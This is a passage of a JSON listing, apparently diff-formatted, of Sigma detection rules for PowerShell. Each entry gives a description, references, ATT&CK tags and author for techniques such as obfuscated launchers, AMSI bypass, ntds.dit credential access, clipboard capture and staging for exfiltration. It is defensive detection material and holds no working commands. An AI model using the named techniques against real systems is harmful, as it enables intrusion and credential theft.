"description": "A General detection for specific decompress commands in PowerShell logs. This could be an adversary decompressing files.", - "uuid": "1ddc1472-8e52-4f7d-9f11-eab14fc171f5", - "value": "PowerShell Decompress Commands", - "meta": { - "refs": [ - "https://github.com/OTRF/detection-hackathon-apt29/issues/8", - "https://threathunterplaybook.com/evals/apt29/detections/4.A.3_09F29912-8E93-461E-9E89-3F06F6763383.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_decompress_commands.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1140" - ], - "creation_date": "2020/05/02", - "filename": "posh_pm_decompress_commands.yml", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", - "level": "informational", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "ps_module", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious invocation of the Get-ADDBAccount script that reads from a ntds.dit file and may be used to get access to credentials without using any credential dumpers", - "uuid": "b140afd9-474b-4072-958e-2ebb435abd68", - "value": "Suspicious Get-ADDBAccount Usage", - "meta": { - "refs": [ - "https://www.n00py.io/2022/03/manipulating-user-passwords-without-mimikatz/", - "https://github.com/MichaelGrafnetter/DSInternals/blob/7ba59c12ee9a1cb430d7dc186a3366842dd612c8/Documentation/PowerShell/Get-ADDBAccount.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_get_addbaccount.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.003" - ], - "creation_date": "2022/03/16", - "filename": "posh_pm_get_addbaccount.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "ps_module", - "logsource.product": "windows" - } - }, - { - "description": "A General detection for the Get-Clipboard commands in PowerShell logs. This could be an adversary capturing clipboard contents.", - "uuid": "4cbd4f12-2e22-43e3-882f-bff3247ffb78", - "value": "PowerShell Get Clipboard", - "meta": { - "refs": [ - "https://github.com/OTRF/detection-hackathon-apt29/issues/16", - "https://threathunterplaybook.com/evals/apt29/detections/7.A.2_F4609F7E-C4DB-4327-91D4-59A58C962A02.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_get_clipboard.yml" - ], - "tags": [ - "attack.collection", - "attack.t1115" - ], - "creation_date": "2020/05/02", - "filename": "posh_pm_get_clipboard.yml", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "ps_module", - "logsource.product": "windows" - } - }, - { - "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", - "uuid": "a136cde0-61ad-4a61-9b82-8dc490e60dd2", - "value": "Invoke-Obfuscation CLIP+ Launcher - PowerShell Module", - "meta": { - "refs": [ - "https://github.com/Neo23x0/sigma/issues/1009", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_clip.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2020/10/13", - "filename": "posh_pm_invoke_obfuscation_clip.yml", - "author": "Jonathan Cheong, oscd.community", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "ps_module", - "logsource.product": "windows" - } - }, - { - "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block cited in the reference section below", - "uuid": "2f211361-7dce-442d-b78a-c04039677378", - "value": "Invoke-Obfuscation Obfuscated IEX Invocation - PowerShell Module", - "meta": { - "refs": [ - "https://github.com/danielbohannon/Invoke-Obfuscation/blob/f20e7f843edd0a3a7716736e9eddfa423395dd26/Out-ObfuscatedStringCommand.ps1#L873-L888", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_obfuscated_iex.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2019/11/08", - "filename": "posh_pm_invoke_obfuscation_obfuscated_iex.yml", - "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "ps_module", - "logsource.product": "windows" - } - }, - { - "description": "Detects Obfuscated use of stdin to execute PowerShell", - "uuid": "9ac8b09b-45de-4a07-9da1-0de8c09304a3", - "value": "Invoke-Obfuscation STDIN+ Launcher - PowerShell Module", - "meta": { - "refs": [ - "https://github.com/Neo23x0/sigma/issues/1009", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_stdin.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2020/10/15", - "filename": "posh_pm_invoke_obfuscation_stdin.yml", - "author": "Jonathan Cheong, oscd.community", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "ps_module", - "logsource.product": "windows" - } - }, - { - "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", - "uuid": "6bfb8fa7-b2e7-4f6c-8d9d-824e5d06ea9e", - "value": "Invoke-Obfuscation VAR+ Launcher - PowerShell Module", - "meta": { - "refs": [ - "https://github.com/Neo23x0/sigma/issues/1009", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_var.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2020/10/15", - "filename": "posh_pm_invoke_obfuscation_var.yml", - "author": "Jonathan Cheong, oscd.community", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "ps_module", - "logsource.product": "windows" - } - }, - { - "description": "Detects Obfuscated Powershell via COMPRESS OBFUSCATION", - "uuid": "7034cbbb-cc55-4dc2-8dad-36c0b942e8f1", - "value": "Invoke-Obfuscation COMPRESS OBFUSCATION - PowerShell Module", - "meta": { - "refs": [ - "https://github.com/Neo23x0/sigma/issues/1009", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_via_compress.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2020/10/18", - "filename": "posh_pm_invoke_obfuscation_via_compress.yml", - "author": "Timur Zinniatullin, oscd.community", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "ps_module", - "logsource.product": "windows" - } - }, - { - "description": "Detects Obfuscated Powershell via RUNDLL LAUNCHER", - "uuid": "a23791fe-8846-485a-b16b-ca691e1b03d4", - "value": "Invoke-Obfuscation RUNDLL LAUNCHER - PowerShell Module", - "meta": { - "refs": [ - "https://github.com/Neo23x0/sigma/issues/1009", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_via_rundll.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2020/10/18", - "filename": "posh_pm_invoke_obfuscation_via_rundll.yml", - "author": "Timur Zinniatullin, oscd.community", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "ps_module", - "logsource.product": "windows" - } - }, - { - "description": "Detects Obfuscated Powershell via Stdin in Scripts", - "uuid": "c72aca44-8d52-45ad-8f81-f96c4d3c755e", - "value": "Invoke-Obfuscation Via Stdin - PowerShell Module", - "meta": { - "refs": [ - "https://github.com/Neo23x0/sigma/issues/1009", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_via_stdin.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2020/10/12", - "filename": "posh_pm_invoke_obfuscation_via_stdin.yml", - "author": "Nikita Nazarov, oscd.community", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "ps_module", - "logsource.product": "windows" - } - }, - { - "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", - "uuid": "ebdf49d8-b89c-46c9-8fdf-2c308406f6bd", - "value": "Invoke-Obfuscation Via Use Clip - PowerShell Module", - "meta": { - "refs": [ - "https://github.com/Neo23x0/sigma/issues/1009", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_via_use_clip.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2020/10/09", - "filename": "posh_pm_invoke_obfuscation_via_use_clip.yml", - "author": "Nikita Nazarov, oscd.community", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "ps_module", - "logsource.product": "windows" - } - }, - { - "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", - "uuid": "07ad2ea8-6a55-4ac6-bf3e-91b8e59676eb", - "value": "Invoke-Obfuscation Via Use MSHTA - PowerShell Module", - "meta": { - "refs": [ - "https://github.com/Neo23x0/sigma/issues/1009", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_via_use_mhsta.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2020/10/08", - "filename": "posh_pm_invoke_obfuscation_via_use_mhsta.yml", - "author": "Nikita Nazarov, oscd.community", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "ps_module", - "logsource.product": "windows" - } - }, - { - "description": "Detects Obfuscated Powershell via use Rundll32 in Scripts", - "uuid": "88a22f69-62f9-4b8a-aa00-6b0212f2f05a", - "value": "Invoke-Obfuscation Via Use Rundll32 - PowerShell Module", - "meta": { - "refs": [ - "https://github.com/Neo23x0/sigma/issues/1009", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_via_use_rundll32.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2019/10/08", - "filename": "posh_pm_invoke_obfuscation_via_use_rundll32.yml", - "author": "Nikita Nazarov, oscd.community", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "ps_module", - "logsource.product": "windows" - } - }, - { - "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", - "uuid": "f3c89218-8c3d-4ba9-9974-f1d8e6a1b4a6", - "value": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - PowerShell Module", - "meta": { - "refs": [ - "https://github.com/Neo23x0/sigma/issues/1009", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_via_var.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2020/10/13", - "filename": "posh_pm_invoke_obfuscation_via_var.yml", - "author": "Timur Zinniatullin, oscd.community", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "ps_module", - "logsource.product": "windows" - } - }, - { - "description": "Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network", - "uuid": "bf7286e7-c0be-460b-a7e8-5b2e07ecc2f2", - "value": "Netcat The Powershell Version - PowerShell Module", - "meta": { - "refs": [ - "https://nmap.org/ncat/", - "https://github.com/besimorhino/powercat", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1095/T1095.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_powercat.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1095" - ], - "creation_date": "2021/07/21", - "filename": "posh_pm_powercat.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "ps_module", - "logsource.product": "windows" - } - }, - { - "description": "Detects remote PowerShell sessions", - "uuid": "96b9f619-aa91-478f-bacb-c3e50f8df575", - "value": "Remote PowerShell Session (PS Module)", - "meta": { - "refs": [ - "https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190511223310.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_remote_powershell_session.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.lateral_movement", - "attack.t1021.006" - ], - "creation_date": "2019/08/10", - "filename": "posh_pm_remote_powershell_session.yml", - "author": "Roberto Rodriguez @Cyb3rWard0g, Tim Shelton", - "level": "high", - "falsepositive": [ - "Legitimate use remote PowerShell sessions" - ], - "logsource.category": "ps_module", - "logsource.product": "windows" - } - }, - { - "description": "Adversaries may attempt to find domain-level groups and permission settings.\nThe knowledge of domain-level permission groups can help adversaries determine which groups exist and which users belong to a particular group.\nAdversaries may use this information to determine which users have elevated permissions, such as domain administrators.\n", - "uuid": "815bfc17-7fc6-4908-a55e-2f37b98cedb4", - "value": "AD Groups Or Users Enumeration Using PowerShell - PoshModule", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.002/T1069.002.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_susp_ad_group_reco.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1069.001" - ], - "creation_date": "2021/12/15", - "filename": "posh_pm_susp_ad_group_reco.yml", - "author": "frack113", - "level": "low", - "falsepositive": [ - "Administrator script" - ], - "logsource.category": "ps_module", - "logsource.product": "windows" - } - }, - { - "description": "RemoteFXvGPUDisablement.exe is an abusable, signed PowerShell host executable that was introduced in Windows 10 and Server 2019 (OS Build 17763.1339).", - "uuid": "38a7625e-b2cb-485d-b83d-aff137d859f4", - "value": "Abusable Invoke-ATHRemoteFXvGPUDisablementCommand - PowerShell Module", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md", - "https://github.com/redcanaryco/AtomicTestHarnesses/blob/7e1e4da116801e3d6fcc6bedb207064577e40572/TestHarnesses/T1218_SignedBinaryProxyExecution/InvokeRemoteFXvGPUDisablementCommand.ps1", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_susp_athremotefxvgpudisablementcommand.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218" - ], - "creation_date": "2021/07/13", - "filename": "posh_pm_susp_athremotefxvgpudisablementcommand.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "ps_module", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious PowerShell download command", - "uuid": "de41232e-12e8-49fa-86bc-c05c7e722df9", - "value": "Suspicious PowerShell Download - PowerShell Module", - "meta": { - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_susp_download.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2017/03/05", - "filename": "posh_pm_susp_download.yml", - "author": "Florian Roth", - "level": "medium", - "falsepositive": [ - "PowerShell scripts that download content from the Internet" - ], - "logsource.category": "ps_module", - "logsource.product": "windows" - } - }, - { - "description": "Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.", - "uuid": "aff815cc-e400-4bf0-a47a-5d8a2407d4e1", - "value": "Use Get-NetTCPConnection - PowerShell Module", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1049/T1049.md#atomic-test-2---system-network-connections-discovery-with-powershell", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_susp_get_nettcpconnection.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1049" - ], - "creation_date": "2021/12/10", - "filename": "posh_pm_susp_get_nettcpconnection.yml", - "author": "frack113", - "level": "low", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "ps_module", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious PowerShell invocation command parameters", - "uuid": "bbb80e91-5746-4fbe-8898-122e2cafdbf4", - "value": "Suspicious PowerShell Invocations - Generic - PowerShell Module", - "meta": { - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_susp_invocation_generic.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2017/03/12", - "filename": "posh_pm_susp_invocation_generic.yml", - "author": "Florian Roth (rule)", - "level": "high", - "falsepositive": [ - "Very special / sneaky PowerShell scripts" - ], - "logsource.category": "ps_module", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious PowerShell invocation command parameters", - "uuid": "8ff28fdd-e2fa-4dfa-aeda-ef3d61c62090", - "value": "Suspicious PowerShell Invocations - Specific - PowerShell Module", - "meta": { - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_susp_invocation_specific.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2017/03/05", - "filename": "posh_pm_susp_invocation_specific.yml", - "author": "Florian Roth (rule), Jonhnathan Ribeiro", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "ps_module", - "logsource.product": "windows" - } - }, - { - "description": "Adversaries may attempt to find local system groups and permission settings.\nThe knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group.\nAdversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group.\n", - "uuid": "cef24b90-dddc-4ae1-a09a-8764872f69fc", - "value": "Suspicious Get Local Groups Information", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.001/T1069.001.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_susp_local_group_reco.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1069.001" - ], - "creation_date": "2021/12/12", - "filename": "posh_pm_susp_local_group_reco.yml", - "author": "frack113", - "level": "low", - "falsepositive": [ - "Administrator script" - ], - "logsource.category": "ps_module", - "logsource.product": "windows" - } - }, - { - "description": "The Reset-ComputerMachinePassword cmdlet changes the computer account password that the computers use to authenticate to the domain controllers in the domain.\nYou can use it to reset the password of the local computer.\n", - "uuid": "e3818659-5016-4811-a73c-dde4679169d2", - "value": "Suspicious Computer Machine Password by PowerShell", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/reset-computermachinepassword?view=powershell-5.1", - "https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_susp_reset_computermachinepassword.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1078" - ], - "creation_date": "2022/02/21", - "filename": "posh_pm_susp_reset_computermachinepassword.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Administrator PowerShell scripts" - ], - "logsource.category": "ps_module", - "logsource.product": "windows" - } - }, - { - "description": "Adversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as a precursor for Collection and\nto identify potential systems of interest for Lateral Movement.\nNetworks often contain shared network drives and folders that enable users to access file directories on various systems across a network.\n", - "uuid": "6942bd25-5970-40ab-af49-944247103358", - "value": "Suspicious Get Information for SMB Share - PowerShell Module", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.002/T1069.002.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_susp_smb_share_reco.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1069.001" - ], - "creation_date": "2021/12/15", - "filename": "posh_pm_susp_smb_share_reco.yml", - "author": "frack113", - "level": "low", - "falsepositive": [ - "Administrator script" - ], - "logsource.category": "ps_module", - "logsource.product": "windows" - } - }, - { - "description": "Use living off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration", - "uuid": "daf7eb81-35fd-410d-9d7a-657837e602bb", - "value": "Zip A Folder With PowerShell For Staging In Temp - PowerShell Module", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1074.001/T1074.001.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_susp_zip_compress.yml" - ], - "tags": [ - "attack.collection", - "attack.t1074.001" - ], - "creation_date": "2021/07/20", - "filename": "posh_pm_susp_zip_compress.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "ps_module", - "logsource.product": "windows" - } - }, - { - "description": "Detects SyncAppvPublishingServer process execution which usually utilized by adversaries to bypass PowerShell execution restrictions.", - "uuid": "fe5ce7eb-dad8-467c-84a9-31ec23bd644a", - "value": "SyncAppvPublishingServer Bypass Powershell Restriction - PS Module", - "meta": { - "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishingserver/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_syncappvpublishingserver_exe.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218" - ], - "creation_date": "2020/10/05", - "filename": "posh_pm_syncappvpublishingserver_exe.yml", - "author": "Ensar \u015eamil, @sblmsrsn, OSCD Community", - "level": "medium", - "falsepositive": [ - "App-V clients" - ], - "logsource.category": "ps_module", - "logsource.product": "windows" - } - }, - { - "description": "Detecting use WinAPI Functions in PowerShell", - "uuid": "03d83090-8cba-44a0-b02f-0b756a050306", - "value": "Accessing WinAPI in PowerShell", - "meta": { - "refs": [ - "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_accessing_win_api.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.t1106" - ], - "creation_date": "2020/10/06", - "filename": "posh_ps_accessing_win_api.yml", - "author": "Nikita Nazarov, oscd.community, Tim Shelton", - "level": "high", - "falsepositive": [ - "Carbon PowerShell Module (https://github.com/webmd-health-services/Carbon)" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Adversaries may acquire credentials from web browsers by reading files specific to the target browser.\nWeb browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future.\nWeb browsers typically store the credentials in an encrypted format within a credential store.\n", - "uuid": "fc028194-969d-4122-8abe-0470d5b8f12f", - "value": "Access to Browser Login Data", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1555.003/T1555.003.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_access_to_browser_login_data.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1555.003" - ], - "creation_date": "2022/01/30", - "filename": "posh_ps_access_to_browser_login_data.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Detects powershell scripts that adds a Name Resolution Policy Table (NRPT) rule for the specified namespace.\nThis will bypass the default DNS server and uses a specified server for answering the query.\n", - "uuid": "4368354e-1797-463c-bc39-a309effbe8d7", - "value": "Powershell Add Name Resolution Policy Table Rule", - "meta": { - "refs": [ - "https://twitter.com/NathanMcNulty/status/1569497348841287681", - "https://docs.microsoft.com/en-us/powershell/module/dnsclient/add-dnsclientnrptrule?view=windowsserver2022-ps", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_add_dnsclient_rule.yml" - ], - "tags": [ - "attack.impact", - "attack.t1565" - ], - "creation_date": "2021/09/14", - "filename": "posh_ps_add_dnsclient_rule.yml", - "author": "Borna Talebi", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Detects execution of ADRecon.ps1 for AD reconnaissance which has been reported to be actively used by FIN7", - "uuid": "bf72941a-cba0-41ea-b18c-9aca3925690d", - "value": "PowerShell ADRecon Execution", - "meta": { - "refs": [ - "https://github.com/sense-of-security/ADRecon/blob/11881a24e9c8b207f31b56846809ce1fb189bcc9/ADRecon.ps1", - "https://bi-zone.medium.com/from-pentest-to-apt-attack-cybercriminal-group-fin7-disguises-its-malware-as-an-ethical-hackers-c23c9a75e319", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_adrecon_execution.yml" - ], - "tags": [ - "attack.discovery", - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2021/07/16", - "filename": "posh_ps_adrecon_execution.yml", - "author": "Bhabesh Raj", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Detects code fragments found in small and obfuscated AMSI bypass PowerShell scripts", - "uuid": "e0d6c087-2d1c-47fd-8799-3904103c5a98", - "value": "AMSI Bypass Pattern Assembly GetType", - "meta": { - "refs": [ - "https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/", - "https://twitter.com/cyb3rops/status/1588574518057979905?s=20&t=A7hh93ONM7ni1Rj1jO5OaA", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_amsi_bypass_pattern_nov22.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001", - "attack.execution" - ], - "creation_date": "2022/11/09", - "filename": "posh_ps_amsi_bypass_pattern_nov22.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Detects Silence EmpireDNSAgent as described in the Group-IP report", - "uuid": "3ceb2083-a27f-449a-be33-14ec1b7cc973", - "value": "Silence.EDA Detection", - "meta": { - "refs": [ - "https://www.group-ib.com/resources/threat-research/silence_2.0.going_global.pdf", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_apt_silence_eda.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.command_and_control", - "attack.t1071.004", - "attack.t1572", - "attack.impact", - "attack.t1529", - "attack.g0091", - "attack.s0363" - ], - "creation_date": "2019/11/01", - "filename": "posh_ps_apt_silence_eda.yml", - "author": "Alina Stepchenkova, Group-IB, oscd.community", - "level": "critical", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects AS-REP roasting is an attack that is often-overlooked. It is not very common as you have to explicitly set accounts that do not require pre-authentication.", - "uuid": "96c982fe-3d08-4df4-bed2-eb14e02f21c8", - "value": "Get-ADUser Enumeration Using UserAccountControl Flags", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.002/T1069.002.md#atomic-test-11---get-aduser-enumeration-using-useraccountcontrol-flags-as-rep-roasting", - "https://shellgeek.com/useraccountcontrol-flags-to-manipulate-properties/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_as_rep_roasting.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1033" - ], - "creation_date": "2022/03/17", - "filename": "posh_ps_as_rep_roasting.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Legitimate PowerShell scripts" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Once established within a system or network, an adversary may use automated techniques for collecting internal data.", - "uuid": "c1dda054-d638-4c16-afc8-53e007f3fbc5", - "value": "Automated Collection Command PowerShell", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1119/T1119.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_automated_collection.yml" - ], - "tags": [ - "attack.collection", - "attack.t1119" - ], - "creation_date": "2021/07/28", - "filename": "posh_ps_automated_collection.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Detects the execution of AzureHound in PowerShell, a tool to gather data from Azure for BloodHound", - "uuid": "83083ac6-1816-4e76-97d7-59af9a9ae46e", - "value": "AzureHound PowerShell Commands", - "meta": { - "refs": [ - "https://github.com/BloodHoundAD/BloodHound/blob/0927441f67161cc6dc08a53c63ceb8e333f55874/Collectors/AzureHound.ps1", - "https://bloodhound.readthedocs.io/en/latest/data-collection/azurehound.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_azurehound_commands.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1482", - "attack.t1087", - "attack.t1087.001", - "attack.t1087.002", - "attack.t1069.001", - "attack.t1069.002", - "attack.t1069" - ], - "creation_date": "2021/10/23", - "filename": "posh_ps_azurehound_commands.yml", - "author": "Austin Songer (@austinsonger)", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation.\nScreen capturing functionality may be included as a feature of a remote access tool used in 